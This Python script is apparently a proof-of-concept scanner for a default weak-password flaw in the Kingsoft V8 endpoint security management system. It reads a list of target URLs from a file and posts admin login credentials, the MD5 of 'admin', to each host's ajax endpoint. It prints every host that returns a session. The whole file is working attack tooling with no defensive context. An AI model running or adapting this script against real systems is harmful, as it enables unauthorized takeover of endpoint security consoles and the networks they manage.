#!/usr/bin/env python
# -*- coding:utf-8 _*-
"""
@author:leonis072
@file: 金山 V8 终端安全系统 默认弱口令漏洞.py
@time: 2021/04/20
@function:
"""
import requests
import time
def poc(poc):
for url in open('jinshan.txt'):
url = url.replace('\n', '')
poc_url = url + poc
data = '{"get_user_login_cmd":{"name":"admin","password":"21232f297a57a5a743894a0e4a801fc3"}}'
try:
response = requests.post(url=poc_url, data=data)
except Exception as e:
pass
if 'userSession' in response.text:
print(url)
# print('{}存在漏洞'.format(url))
time.sleep(5)
if __name__ == '__main__':
poc_url = '/inter/ajax.php?cmd=get_user_login_cmd'
poc(poc_url)
